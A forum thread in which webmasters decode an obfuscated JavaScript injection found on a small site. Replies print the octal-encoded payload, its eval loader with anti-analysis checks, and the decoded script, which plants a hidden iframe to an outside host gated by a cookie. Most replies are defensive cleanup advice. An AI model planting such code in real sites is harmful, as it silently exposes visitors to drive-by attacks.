homepage Welcome to WebmasterWorld Guest from 174.129.76.87
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Home / Forums Index / Code, Content, and Presentation / JavaScript and AJAX
Forum Library, Charter, Moderator: open

JavaScript and AJAX Forum

    
Probable injection - can anyone translate
topr8

WebmasterWorld Senior Member topr8 us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 4573430 posted 8:16 am on May 13, 2013 (gmt 0)

a friend of mine seems to have had some kind of javascript injection into their site ... i've cleaned it all up for them, i suspect the host is to blame as they don't have a database or run any scripts except for a mailer (which is supplied by the host) ... maybe the ftp was hacked but i doubt it.

anyway, any idea what this means, this was the first bit, i assume they translate to characters in some way...

a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,
16,44,172,145,166,44,171,171,172,44,101,44,150,163,147,171,161,151,162,170,62,147,
166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,
53,55,77,21,16,21,16,44,171,171,172,62,167,166,147,44,101,44,53,154,170,170,164,
76,63,63,152,145,160,160,163,171,170,67,62,145,147,147,155,62,147,176,63,153,
114,165,133,106,170,166,174,62,164,154,164,53,77,21,16,44,171,171,172,62,167,
170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,
163,160,171,170,151,53,77,21,16,44,171,171,172,62,167,170,175,160,151,62,146,
163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,171,171,172,62,167,170,175,
160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,171,
171,172,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,
53,77,21,16,44,171,171,172,62,167,170,175,160,151,62,160,151,152,170,44,101,44,
53,65,164,174,53,77,21,16,44,171,171,172,62,167,170,175,160,151,62,170,163,164,
44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,
161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,
53,171,171,172,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,
166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,171,171,172,140,53,
102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,
153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,171,171,172,53,
55,62,145,164,164,151,162,150,107,154,155,160,150,54,171,171,172,55,77,21,16,44,
201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,
157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,
151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,
21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,
170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,
162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,
175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,
64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,
167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,
161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,
55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,
101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,
145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,
44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,
151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,
164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,
145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,
163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,
44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,
171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,
152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,
44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,
160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,
167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,
101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,
171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,
151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,
170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,
44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,
170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,
162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,
157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,
160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,
101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,
151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,
154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,
145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,
157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,
162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,
162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,
162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,
107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,
165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,
107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,
165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,
21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","))

 

bhonda

5+ Year Member



 
Msg#: 4573430 posted 8:54 am on May 13, 2013 (gmt 0)

Was there any code to use it? I've just searched for a subset of this code and noticed some have this before it -

ss=eval("Str"+"ing");d=document;a=("44,152...

topr8

WebmasterWorld Senior Member topr8 us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 4573430 posted 9:24 am on May 13, 2013 (gmt 0)

yes, i found a few sites had it when i did a search...

the full code was:
as pasted above followed by...

ss=eval("Str"+"ing");d=document;for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body++}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));




so the a= was at the beginning in this case.

bhonda

5+ Year Member



 
Msg#: 4573430 posted 11:17 am on May 13, 2013 (gmt 0)

So, the first few numbers in the array would be -

32
102
117
110

Are they HTML codes?

32 = [space]
102 = f
117 = u
110 = n
99 = c
116 = t
105 = i
111 = o
110 = n

Hmm...looks so. Anyone fancy writing a little convertor for this?

astupidname

5+ Year Member



 
Msg#: 4573430 posted 11:44 am on May 13, 2013 (gmt 0)

That string you posted (definition of the 'a' variable) has illegal new lines in it (broken string) so after replacing new lines, remove the other bits of code which appear after the definition of the 'a' variable and replace with the following:
d=document;
for(i=0;i<a.length;i+=1){
a[i]=parseInt(a[i],8)-(7-3);
}
try{d.body++}catch(q){zz=0;}
try{zz&=2}catch(q){zz=1;}
if(!zz)if(window["document"])a = String.fromCharCode.apply(String, a);
alert(a);


The non-evaluated code as a string is then presented to you as:

 function zzzfff() {
var uuv = document.createElement('iframe');

uuv.src = 'http://example.com';
uuv.style.position = 'absolute';
uuv.style.border = '0';
uuv.style.height = '1px';
uuv.style.width = '1px';
uuv.style.left = '1px';
uuv.style.top = '1px';

if (!document.getElementById('uuv')) {
document.write('<div id=\'uuv\'></div>');
document.getElementById('uuv').appendChild(uuv);
}
}
function SetCookie(cookieName,cookieValue,nDays,path) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0) nDays=1;
expire.setTime(today.getTime() + 3600000*24*nDays);
document.cookie = cookieName+"="+escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

zzzfff();
}
}

[edited by: whoisgregg at 2:05 pm (utc) on May 16, 2013]
[edit reason] sanitized url [/edit]

bhonda

5+ Year Member



 
Msg#: 4573430 posted 11:46 am on May 13, 2013 (gmt 0)

Man, you got there just before I did!

Might be worth removing the URL.

topr8

WebmasterWorld Senior Member topr8 us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 4573430 posted 5:25 am on May 18, 2013 (gmt 0)

thanks for the replies - i thought the thread had been deleted!

lucy24

WebmasterWorld Senior Member lucy24 us a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



 
Msg#: 4573430 posted 7:09 am on May 18, 2013 (gmt 0)

as pasted above followed by...

Aha, the missing link. If you take the original numbers at face value it's garbage:
,˜«ą“Ș›Łą,°°°˜˜˜
et cetera. (The number that turns into 32, i.e. space, starts out as 44 which happens to be a comma.)

illegal new lines

I think they were inserted by a moderator because the original post would otherwise have circled the earth :)

jimbeetle

WebmasterWorld Senior Member jimbeetle us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 4573430 posted 10:17 pm on May 18, 2013 (gmt 0)

i suspect the host is to blame as they don't have a database or run any scripts except for a mailer (which is supplied by the host) ... maybe the ftp was hacked but i doubt it

The host doesn't have to be the to blame, the site doesn't have to run a database or any scripts. And *don't* doubt that the ftp was hacked.

Have your friend scrub the locl machine just in case a keylogger was downloaded. This is a *very* common technique for the bad guys to capture passwords. I was hit a few years ago.

i've cleaned it all up for them

Are you sure? Did you just clean the files or did you find the file the bad guys might have left behind?

topr8

WebmasterWorld Senior Member topr8 us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 4573430 posted 2:37 pm on May 19, 2013 (gmt 0)

>>I think they were inserted by a moderator because the original post would otherwise have circled the earth

actually yes, i make the line breaks before posting, as i realised it would have stretched on forever!

>>Are you sure?

well i did my best ... deleted all the files on the server from their filespace.
then manually checked every file (there were not that many, only around 50 and they were only plain html) i removed all the 'injected' lines of code.
i also suggested that they reinstall windows on their local machine, which they said they did, they live in a different town to me, i wasn't going to drive over and do it for them!

but i appreciate your point jim, this is not my area of expertise and it is entirely possible that i may have missed something. so far though the injection hasn't recurred.

thanks for everyone's input, much appreciated.

so i can see the code set a presumably malicious iframe, which would have tried to run some kind of script on the site visitors machines.... i guess this is the common purpose of these type of injection attacks.

jimbeetle

WebmasterWorld Senior Member jimbeetle us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 4573430 posted 3:31 pm on May 21, 2013 (gmt 0)

It's not my area of expertise at all, either, just that one very painful experience.

I'm assuming it's shared hosting so it might be best to contact the host so it can clean any spurious files off the server as from what I shakily understand there can be cross-domain contamination.

topr8

WebmasterWorld Senior Member topr8 us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 4573430 posted 5:22 pm on May 21, 2013 (gmt 0)

i figured it was probably an infection at the host level, but the host was adamant it wasn't them - no knowing if that is true or not though.

i advised them to move hosts anyway just in case, seemed the obvious thing to do.

it made me glad of my own set up! dedicated server, and a hardware firewall which only allows ftp, ssh and any admin page access from my own ip address.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / JavaScript and AJAX
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved